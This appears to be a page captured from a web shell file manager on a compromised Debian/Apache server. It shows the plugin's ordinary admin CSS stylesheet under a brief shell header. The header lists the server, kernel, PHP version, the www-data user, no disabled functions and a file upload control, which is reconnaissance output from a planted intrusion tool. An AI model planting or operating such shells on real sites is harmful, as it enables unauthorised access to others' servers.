HEX
Server: Apache/2.4.65 (Debian)
System: Linux 88f31f35b0b8 6.1.0-38-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.147-1 (2025-08-02) x86_64
User: www-data (33)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/advanced-post-manager/resources/tribe-apm.css
a.tribe-row-add, a.tribe-row-remove {
	cursor:pointer;
	margin-left:6px;
}
a.tribe-row-remove {
	margin-left:3px;
	color:#f00;
}
a.tribe-row-remove:hover, a.tribe-row-remove:focus {
	background-color:#f00;
	color:#fff;
}
a.tribe-row-add:hover, a.tribe-row-add:focus {
	color:#D54E21;
}
.tribe-error {
	background-color:#FFEBE8;
	border:1px solid #c00;
	padding:3px 6px;
	-moz-border-radius:4px;
	-webkit-border-radius:4px;
	border-radius:4px;
	margin-left:9px;
}
#tribe-filters.wrap #filters-wrap {
	margin:36px 0 0;
}
#filters-wrap h3 {
	cursor:pointer;
	border-bottom:1px solid #e5e5e5
}
#the-filters {
	padding:10px 12px 70px 12px;
	overflow:hidden;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}
#the-filters * {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

#the-filters select {
	min-width:150px;
}

#the-filters .alignleft {
	padding-right:2%;
	border-right:1px solid #dfdfdf;
}
#the-filters .actions {
	padding:0;
	border:0 none;
	clear:both;
}
#the-filters .alignleft.save-options {
	clear:both;
	border:0 none;
	display:none;
}
#the-filters #filter_name {
	margin:0;
}
#the-filters input.button-small {
	font-size:11px !important;
	padding:2px 4px 1px;
	position:relative;
	top:1px;
}
#the-filters [name="tribe-delete-saved-filter"]:hover {
	border-color:#a2415d;
}

.saved-filter-actions {
	padding:10px 0 0 0;
	display:inline-block;
}
.saved-filter-actions input {
	display:inline-block;
	margin:0 3px 0 0 !important;
}

.saved-filter-actions input[name="tribe-update-saved-filter"]{
	background: none repeat scroll 0 0 #2ea2cc;
	border-color: #0074a2;
	box-shadow: 0 1px 0 rgba(120, 200, 230, 0.5) inset, 0 1px 0 rgba(0, 0, 0, 0.15);
	color: #fff;
	text-decoration: none;
}

.saved-filter-actions input[name="tribe-update-saved-filter"]:hover{
	background: none repeat scroll 0 0 #1e8cbe;
	border-color: #0074a2;
	box-shadow: 0 1px 0 rgba(120, 200, 230, 0.6) inset;
	color: #fff;
}

.saved-filter-actions input[name="tribe-update-saved-filter"]:active{
	background: none repeat scroll 0 0 #1b7aa6;
	border-color: #005684;
	box-shadow: 0 1px 0 rgba(0, 0, 0, 0.1) inset;
	color: rgba(255, 255, 255, 0.95);
	vertical-align: top;
}

#taxonomy-tribe_contract_type .tabs-panel, #taxonomy-tribe_location .tabs-panel {
	height:100px;
}
.contract-wrapper{
	height:500px;
	width:67%;
	padding-bottom:20px;
	z-index: 1;
	position:relative;
}
#locations-form .button-primary {
	margin:18px 0 0 10px;
}
#locations-form th {
	width:100px;
}
#locations-form td input {
	width:350px;
}
#locations-form .ip-add {
	margin-left:6px;
}
#locations-form thead th {
	font-weight:bold;
	font-size:14px;
}


/* Hide List UI that we don't want */
.tribe-hidden,
.tribe-filters-active select[name=m],
.tribe-filters-active #post-query-submit,
.tribe-filters-active .metabox-prefs,
.tribe-filters-active .metabox-prefs + h5
{
	display:none;
}
.tribe-filters-active .column-comments {
	width: 4em;
}
.tribe-filters-active .column-comments a {
	float: left;
}
.tribe-filters-active .search-box {
	position:relative;
	top:5px;
}
.tribe-filters-active .sorting-indicator {
	display:block;
	visibility:hidden;
}
.tribe-filters-active a:hover .sorting-indicator,
.tribe-filters-active .sorted .sorting-indicator  {
	visibility:visible;
}
.tribe-filters-active .widefat thead th {
	vertical-align:top;
}

h2.select-saved-filter span {
	display:none;
}

/* Empty Results set UI tweaks */
.empty-result-set #posts-filter p:last-of-type {
	font-style:italic;
	font-size:14px;
	margin:0 .5em;
}

#tribe-filters-active .multi-active {
	width:330px;
}

/* Columns Stuff */
#tribe-cols-active {
	margin:12px 0;
}
#tribe-cols-active .close {
	padding:8px 10px;
	font-weight:bold;
	cursor:pointer;
	line-height:1;
	font-size:20px;
	position:absolute;
	right:0;
	top:0;
	color:#858585;
}
#tribe-cols-active .close:hover {
	color:#D54E21;
}
#tribe-cols-active li {
	padding:0 40px 0 20px;
	position:relative;
	line-height:38px;
	height:38px;
	background:#fff;
	font-size:12px;
	cursor:move;
	float:left;
	margin:0 9px 9px 0;
	font-weight:700;
	min-width:30px;
	-webkit-box-shadow: 1px 1px 2px 0px rgba(50, 50, 50, 0.25);
	-moz-box-shadow:    1px 1px 2px 0px rgba(50, 50, 50, 0.25);
	box-shadow:         1px 1px 2px 0px rgba(50, 50, 50, 0.25);
}
#tribe-cols-active li.ui-sortable-placeholder {
	background:none;
	border-style:dashed;
	-moz-border-radius:0px;
	-webkit-border-radius:0px;
	border-radius:0px;
}

/* Filters Stuff */
#tribe-filters-active {
	margin:9px 0;
	width:100%;
	border-collapse:separate;
	border-spacing: 0;
}
#tribe-filters-active th, #tribe-filters-active td {
	vertical-align:middle;
	background:#f2f2f2;
	padding:10px 0;
	border-bottom:3px solid #fff;
}


#tribe-filters-active tr {
	margin-bottom:2px;
}
#tribe-filters-active th {
	width:25%;
	text-align:left;
	font-weight:700;
	font-size:14px;
	color:#9a9a9a;
	padding-left:15px;
}
#tribe-filters-active select, #tribe-filters-active input {
	margin-left:6px;
	vertical-align:top;
	max-width:195px;
}
#tribe-filters-active input {
	width:12em;
}
#tribe-filters-active .close{
	cursor:pointer;
	display:inline-block;
	float:right;
	font-size:24px;
	text-align:center;
	width:24px;
	height:24px;
	line-height:24px;
	margin-right:15px;
	position:relative;
	top:3px;
	background:none;
	color:#9a9a9a;
}

#tribe-filters-active .multi-toggle {
	cursor:pointer;
	display:inline-block;
	float:left;
	font-size:24px;
	text-align:center;
	width:24px;
	height:24px;
	line-height:20px;
	margin-right:15px;
	position:relative;
	top:-2px;
	font-weight:400;
	background:none;
	color:#9a9a9a;
	border-radius:100%;
	border:1px solid #9a9a9a;
	background:#fff;
	font-family:'arial', sans-serif;
}

#tribe-filters-active .multi-toggle.on {
	line-height:21px;
	font-size:18px;
}

#tribe-filters-active .close:hover {
	color:#D54E21;
	border-color:#666;
}
#tribe-filters-active .multi-toggle {
	float:none;
	display:inline-block;
	margin:4px 0 0 6px;
}
#tribe-filters-active .multi-toggle:hover {
	color:#27a51a;
	border-color:#666;
}
#tribe-filters-active .multi-active {
	margin-bottom:-4px;
}

#posts-filter th .sort {
	font-weight:normal;
	margin-left:4px;
	font-size:14px;
	line-height:11px;
}
#posts-filter th.desc .sort {
	font-size:18px;
	line-height:8px;
	position:relative;
	top:1px;
}
#posts-filter thead th .sortit {
	cursor:pointer;
	color:#21759B;
}
#posts-filter thead th .sortit:hover {
	color:#D54E21;
}
input.button-secondary.csv {
	margin-left:2em;
}

#wpcontent select.multi, select.multi {
	height:auto;
	min-height:5em;
	max-height:8em;
}

.columns {
	background:#f1f1f1;
	padding:20px;
	margin-top:15px;
}

.columns h2 {
	font-weight:700;
	font-size:20px;
	margin:0 0 15px 0;
	padding:0;
}

.columns p {
	font-size:14px;
	font-style:italic;
	color:#6d6d6d;
}

.apm-actions{
	position:absolute;
	width:100%;
	bottom:0;
	left:0;
	padding:10px 12px;
	background:#d7d4d4;
}

.apm-select-wrap {

}

.apm-saved-filters h2 {
	font-weight:700;
	font-size:20px;
	margin-bottom:15px;
}

.apm-inactive-filters h4 {
	font-weight:700;
	font-size:20px;
	margin-bottom:15px;
}

#the-filters .select2-search-field .select2-input {
	line-height:25px;
	height:25px;
}

.actions .button-secondary.save{
	background: none repeat scroll 0 0 #2ea2cc;
	border-color: #0074a2;
	box-shadow: 0 1px 0 rgba(120, 200, 230, 0.5) inset, 0 1px 0 rgba(0, 0, 0, 0.15);
	color: #fff;
	text-decoration: none;
}

.actions .button-secondary.save:hover{
	background: none repeat scroll 0 0 #1e8cbe;
	border-color: #0074a2;
	box-shadow: 0 1px 0 rgba(120, 200, 230, 0.6) inset;
	color: #fff;
}

.actions .button-secondary.save:active{
	background: none repeat scroll 0 0 #1b7aa6;
	border-color: #005684;
	box-shadow: 0 1px 0 rgba(0, 0, 0, 0.1) inset;
	color: rgba(255, 255, 255, 0.95);
	vertical-align: top;
}

.button-primary.button-apm-reset{
	background: #5ac377;
	border-color: #159622;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset, 0 1px 0 rgba(0, 0, 0, 0.15);

}
.button-primary.button-apm-reset:hover {
	background: 0 0 #4eaf69;
	border-color: #12821e;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
}
.button-primary.button-apm-reset:active {
	background: 0 0 #4eaf69;
	border-color: #12821e;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
}

@media only screen and (min-width : 1200px) {
	.columns {
		margin-top:0;
	}
	#tribe-filters-active {
		width: 90%;
	}
	#the-filters .columns {
		width:40%;
		float:left;
	}
	#the-filters .filters {
		width:60%;
		float:left;
	}
}